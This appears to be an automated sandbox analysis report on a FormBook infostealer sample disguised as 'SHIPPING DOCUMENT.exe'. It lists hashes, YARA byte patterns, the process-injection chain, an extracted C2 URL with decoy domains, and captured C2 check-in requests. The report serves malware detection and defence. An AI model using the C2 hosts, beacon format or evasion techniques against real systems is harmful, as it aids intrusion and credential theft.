
Analysis Report SHIPPING DOCUMENT.exe

Overview

General Information

Sample Name: SHIPPING DOCUMENT.exe
Analysis ID: 404217
MD5: 25e847b9631bc2fe8d87fe4278fa142e
SHA1: 641756a84fdce68e101a53cfa6809b68190b7ad7
SHA256: 70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
Tags: exe

Detection

Detection: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • SHIPPING DOCUMENT.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
    • SHIPPING DOCUMENT.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5752 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6948 cmdline: /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.1.SHIPPING DOCUMENT.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.SHIPPING DOCUMENT.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll | ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: SHIPPING DOCUMENT.exe | Virustotal: Detection: 34%
Source: SHIPPING DOCUMENT.exe | ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SHIPPING DOCUMENT.exe | Joe Sandbox ML: detected
Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: SHIPPING DOCUMENT.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: SHIPPING DOCUMENT.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL | source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_0040659C FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_004027A1 FindFirstFileA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.knighttechinca.com/dxe/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1 | Host: www.barkinlot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1 | Host: www.buyruon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1 | Host: www.fuerzaagavera.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1 | Host: www.union-green.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 64.190.62.111
Source: Joe Sandbox View | ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: unknown | DNS traffic detected: queries for: www.barkinlot.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: SHIPPING DOCUMENT.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SHIPPING DOCUMENT.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | String found in binary or memory: http://www.yabovip1288.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: SHIPPING DOCUMENT.exe Static file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sample Static PE information: Filename: SHIPPING DOCUMENT.exe
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419E90 NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419F40 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419D5A NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419E0A NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419E8A NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00419F3A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B098F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09860 NtQuerySystemInformation, LdrInitializeThunk
